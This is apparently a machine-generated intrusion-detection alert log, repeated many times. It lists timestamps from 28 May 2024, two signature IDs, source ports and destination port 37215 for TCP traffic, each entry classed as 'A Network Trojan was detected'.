            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.065108
            SID:2829579
            Source Port:38146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.508307
            SID:2835222
            Source Port:53154
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.742991
            SID:2835222
            Source Port:60304
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.375201
            SID:2835222
            Source Port:36756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.654597
            SID:2835222
            Source Port:48440
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.442077
            SID:2829579
            Source Port:50084
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.804105
            SID:2835222
            Source Port:38118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873326
            SID:2829579
            Source Port:50634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.774075
            SID:2835222
            Source Port:59516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.310580
            SID:2829579
            Source Port:48074
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.433605
            SID:2829579
            Source Port:54802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.516410
            SID:2829579
            Source Port:43560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.879424
            SID:2829579
            Source Port:35648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.887614
            SID:2835222
            Source Port:60394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.773671
            SID:2829579
            Source Port:52234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:47.601884
            SID:2835222
            Source Port:41562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968291
            SID:2835222
            Source Port:38724
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.952585
            SID:2835222
            Source Port:58834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.279485
            SID:2829579
            Source Port:47848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.861812
            SID:2835222
            Source Port:58184
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.581108
            SID:2829579
            Source Port:57136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.333785
            SID:2835222
            Source Port:57248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.423134
            SID:2829579
            Source Port:40698
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.432763
            SID:2829579
            Source Port:48210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.675321
            SID:2829579
            Source Port:56196
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.870013
            SID:2829579
            Source Port:40030
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.911191
            SID:2829579
            Source Port:53062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.741623
            SID:2835222
            Source Port:52880
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.740515
            SID:2829579
            Source Port:53336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811343
            SID:2835222
            Source Port:33070
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.842310
            SID:2829579
            Source Port:52380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.941361
            SID:2829579
            Source Port:45978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.856288
            SID:2829579
            Source Port:54688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.861375
            SID:2829579
            Source Port:36592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.939060
            SID:2835222
            Source Port:41738
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.916961
            SID:2829579
            Source Port:45734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870414
            SID:2835222
            Source Port:50814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.313252
            SID:2835222
            Source Port:37236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.687643
            SID:2829579
            Source Port:52046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.519729
            SID:2829579
            Source Port:38796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.870256
            SID:2829579
            Source Port:47356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.872293
            SID:2835222
            Source Port:54860
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.786648
            SID:2835222
            Source Port:53808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.543989
            SID:2835222
            Source Port:52388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.745965
            SID:2829579
            Source Port:59178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.685387
            SID:2835222
            Source Port:54072
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919413
            SID:2829579
            Source Port:35482
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936947
            SID:2835222
            Source Port:60442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.372495
            SID:2835222
            Source Port:49262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.843464
            SID:2829579
            Source Port:43076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:41.542901
            SID:2835222
            Source Port:54282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.527129
            SID:2829579
            Source Port:47290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840186
            SID:2829579
            Source Port:55360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.979623
            SID:2835222
            Source Port:34154
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058017
            SID:2835222
            Source Port:58264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837868
            SID:2835222
            Source Port:33612
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.376624
            SID:2829579
            Source Port:46640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776816
            SID:2835222
            Source Port:59220
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045824
            SID:2829579
            Source Port:52450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.953611
            SID:2835222
            Source Port:43686
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.400133
            SID:2829579
            Source Port:35606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.871200
            SID:2829579
            Source Port:58286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.927712
            SID:2829579
            Source Port:49288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.053989
            SID:2835222
            Source Port:47974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748447
            SID:2829579
            Source Port:40506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.760417
            SID:2829579
            Source Port:60544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.894076
            SID:2829579
            Source Port:53328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.943624
            SID:2829579
            Source Port:54414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.617631
            SID:2835222
            Source Port:51084
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.906049
            SID:2829579
            Source Port:57766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.782727
            SID:2835222
            Source Port:48808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.746399
            SID:2835222
            Source Port:58040
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.913342
            SID:2829579
            Source Port:53112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841002
            SID:2835222
            Source Port:38298
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.334297
            SID:2829579
            Source Port:43628
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.855767
            SID:2829579
            Source Port:37850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.792767
            SID:2829579
            Source Port:55762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.340004
            SID:2829579
            Source Port:35488
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.822232
            SID:2829579
            Source Port:48288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.599703
            SID:2829579
            Source Port:39096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.699443
            SID:2835222
            Source Port:54726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048770
            SID:2835222
            Source Port:53116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.436675
            SID:2829579
            Source Port:57256
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.058120
            SID:2829579
            Source Port:47678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.356853
            SID:2829579
            Source Port:55482
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.789093
            SID:2829579
            Source Port:36058
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.979352
            SID:2835222
            Source Port:34352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.549283
            SID:2829579
            Source Port:42562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.859591
            SID:2835222
            Source Port:33116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777817
            SID:2829579
            Source Port:47610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748329
            SID:2835222
            Source Port:57096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.388926
            SID:2835222
            Source Port:47246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.378140
            SID:2829579
            Source Port:55506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.879503
            SID:2829579
            Source Port:33774
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.916943
            SID:2829579
            Source Port:57832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.291802
            SID:2829579
            Source Port:35658
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.757361
            SID:2835222
            Source Port:50296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.222040
            SID:2835222
            Source Port:35052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.734713
            SID:2829579
            Source Port:42560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506502
            SID:2835222
            Source Port:46146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842641
            SID:2835222
            Source Port:41372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.058085
            SID:2835222
            Source Port:54228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.898955
            SID:2835222
            Source Port:37762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.812071
            SID:2835222
            Source Port:44714
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.912940
            SID:2835222
            Source Port:49466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.918978
            SID:2835222
            Source Port:35644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.778108
            SID:2835222
            Source Port:43540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.326651
            SID:2829579
            Source Port:54620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.313048
            SID:2835222
            Source Port:54110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.040961
            SID:2835222
            Source Port:50894
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026036
            SID:2835222
            Source Port:38352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061065
            SID:2829579
            Source Port:50788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280509
            SID:2829579
            Source Port:57494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.881976
            SID:2835222
            Source Port:45862
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.581570
            SID:2835222
            Source Port:39712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754880
            SID:2829579
            Source Port:59016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.995842
            SID:2835222
            Source Port:51572
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321135
            SID:2829579
            Source Port:47858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.990574
            SID:2829579
            Source Port:59382
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.051383
            SID:2835222
            Source Port:46890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.611524
            SID:2835222
            Source Port:60100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.046136
            SID:2835222
            Source Port:32814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.826291
            SID:2835222
            Source Port:49720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.461970
            SID:2829579
            Source Port:42758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.527680
            SID:2829579
            Source Port:38586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.847370
            SID:2829579
            Source Port:38998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.986949
            SID:2829579
            Source Port:59536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.349233
            SID:2829579
            Source Port:43740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.922729
            SID:2835222
            Source Port:41408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.953652
            SID:2835222
            Source Port:34766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.358591
            SID:2835222
            Source Port:43826
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.808874
            SID:2829579
            Source Port:56892
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.871288
            SID:2835222
            Source Port:43682
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.779568
            SID:2835222
            Source Port:51566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.984830
            SID:2829579
            Source Port:56864
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.788941
            SID:2835222
            Source Port:45618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.734945
            SID:2835222
            Source Port:34562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.816681
            SID:2835222
            Source Port:38090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.803910
            SID:2829579
            Source Port:50856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.654541
            SID:2835222
            Source Port:45806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.651395
            SID:2829579
            Source Port:46706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.377803
            SID:2829579
            Source Port:56944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.471894
            SID:2829579
            Source Port:46194
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.871094
            SID:2835222
            Source Port:39410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.525798
            SID:2835222
            Source Port:34256
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.021881
            SID:2835222
            Source Port:56202
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767432
            SID:2829579
            Source Port:46332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.304275
            SID:2829579
            Source Port:32932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919509
            SID:2835222
            Source Port:46960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.553045
            SID:2829579
            Source Port:51764
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.784028
            SID:2835222
            Source Port:45124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.743783
            SID:2835222
            Source Port:35022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.926390
            SID:2835222
            Source Port:57194
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.615241
            SID:2829579
            Source Port:42830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.084355
            SID:2829579
            Source Port:33802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.336653
            SID:2829579
            Source Port:48702
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.070152
            SID:2835222
            Source Port:49858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039744
            SID:2835222
            Source Port:49800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.882556
            SID:2829579
            Source Port:59634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.741606
            SID:2829579
            Source Port:34188
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.952410
            SID:2835222
            Source Port:52330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506825
            SID:2835222
            Source Port:44110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.923222
            SID:2829579
            Source Port:49148
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.296178
            SID:2829579
            Source Port:59656
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.812426
            SID:2835222
            Source Port:55064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.451032
            SID:2829579
            Source Port:36872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.880492
            SID:2835222
            Source Port:38998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863506
            SID:2829579
            Source Port:54758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.432477
            SID:2829579
            Source Port:35528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.510351
            SID:2829579
            Source Port:54832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.574243
            SID:2835222
            Source Port:59610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.579029
            SID:2829579
            Source Port:48342
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.012327
            SID:2829579
            Source Port:43690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.772986
            SID:2829579
            Source Port:33846
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.260746
            SID:2835222
            Source Port:52494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.933909
            SID:2829579
            Source Port:40524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.716907
            SID:2829579
            Source Port:58432
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.863076
            SID:2835222
            Source Port:38338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.710535
            SID:2835222
            Source Port:47338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.772535
            SID:2829579
            Source Port:39548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988745
            SID:2829579
            Source Port:60772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.436947
            SID:2835222
            Source Port:35044
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.012280
            SID:2829579
            Source Port:36482
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.470684
            SID:2835222
            Source Port:33612
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.559300
            SID:2829579
            Source Port:52440
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.918796
            SID:2829579
            Source Port:55588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.746824
            SID:2829579
            Source Port:56730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:09.969350
            SID:2835222
            Source Port:42002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.076812
            SID:2829579
            Source Port:42064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:46.563448
            SID:2829579
            Source Port:54350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.691579
            SID:2829579
            Source Port:53548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.824762
            SID:2829579
            Source Port:36386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.948283
            SID:2829579
            Source Port:51958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.437281
            SID:2829579
            Source Port:39282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.929472
            SID:2835222
            Source Port:55296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.358913
            SID:2835222
            Source Port:40758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.691525
            SID:2829579
            Source Port:59814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
